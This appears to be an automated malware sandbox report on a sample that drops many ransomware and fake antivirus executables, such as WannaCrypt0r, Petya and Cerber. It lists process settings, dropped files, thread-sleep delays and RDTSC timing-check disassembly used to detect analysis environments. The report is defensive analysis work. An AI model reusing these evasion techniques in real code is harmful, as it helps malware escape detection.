          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\antivirus-platinum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\mofcomp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\mofcomp.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000402641 second address: 0000000000402604 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], eax 0x00000005 mov dword ptr [ebp-08h], edx 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b sub eax, dword ptr [ebp-00000120h] 0x00000011 mov ecx, dword ptr [ebp-08h] 0x00000014 sbb ecx, dword ptr [ebp-0000011Ch] 0x0000001a leave 0x0000001b ret 0x0000001c mov esi, eax 0x0000001e call 00007F5818CD7693h 0x00000023 push ebp 0x00000024 mov ebp, esp 0x00000026 sub esp, 00000120h 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000401CE6 second address: 0000000000401C9C instructions: 0x00000000 rdtsc 0x00000002 sub eax, dword ptr [ebp-00000220h] 0x00000008 mov ecx, eax 0x0000000a add dword ptr [ebp-04h], ecx 0x0000000d jmp 00007F5818B248FAh 0x0000000f mov eax, dword ptr [ebp-08h] 0x00000012 inc eax 0x00000013 mov dword ptr [ebp-08h], eax 0x00000016 mov eax, dword ptr [ebp-08h] 0x00000019 sub eax, 64h 0x0000001c je 00007F5818B249BBh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000401D54 second address: 0000000000401D0A instructions: 0x00000000 rdtsc 0x00000002 sub eax, dword ptr [ebp-00000220h] 0x00000008 mov ecx, eax 0x0000000a add dword ptr [ebp-04h], ecx 0x0000000d jmp 00007F5818CD769Ah 0x0000000f mov eax, dword ptr [ebp-08h] 0x00000012 inc eax 0x00000013 mov dword ptr [ebp-08h], eax 0x00000016 mov eax, dword ptr [ebp-08h] 0x00000019 sub eax, 64h 0x0000001c je 00007F5818CD775Bh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeRDTSC instruction interceptor: First address: 00000000132E6568 second address: 00000000132E656E instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\4d44bed6.exe TID: 4240Thread sleep count: 205 > 30Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exe TID: 4240Thread sleep time: -205000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exe TID: 4716Thread sleep time: -480000s >= -30000sJump to behavior
          Source: C:\Windows\302746537.exe TID: 4400Thread sleep count: 212 > 30
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe TID: 2320Thread sleep time: -60000s >= -30000s
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe TID: 2608Thread sleep time: -690000s >= -30000s
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe TID: 2632Thread sleep time: -30000s >= -30000s
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe TID: 2608Thread sleep time: -270000s >= -30000s
          Source: C:\Users\user\Desktop\4d44bed6.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Krotten.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@PCDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Fantom.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SE2011.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@NavaShield.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Xyeta.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@PolyRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@VAV2008.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@LPS2019.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Petya.A.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeJump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@ViraLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeEvaded block: after key decisiongraph_5-11221
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeFile opened: PhysicalDrive0
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeAPI call chain: ExitProcess graph end nodegraph_5-10563
          Source: C:\Windows\302746537.exeAPI call chain: ExitProcess graph end nodegraph_7-3608
          Source: C:\Windows\302746537.exeAPI call chain: ExitProcess graph end nodegraph_7-3819
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeAPI call chain: ExitProcess graph end node
